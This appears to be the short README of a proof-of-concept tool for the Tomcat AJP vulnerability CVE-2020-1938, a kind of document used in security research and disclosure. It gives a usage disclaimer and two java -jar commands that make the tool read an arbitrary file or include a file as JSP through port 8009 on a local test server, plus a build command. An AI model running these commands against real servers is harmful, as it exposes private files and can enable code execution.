
CVE-2020-1938
The tool is only for security research and internal self-inspection. It is prohibited to use the tool to launch illegal attacks. The user is responsible for any consequences.

apache-tomcat-8.5.32.zip test tomcat
Arbitrary file read
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp
File inclusion
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp
Packaging method: In the directory tomcat/ajp-bug Execute mvn clean compile assembly:assembly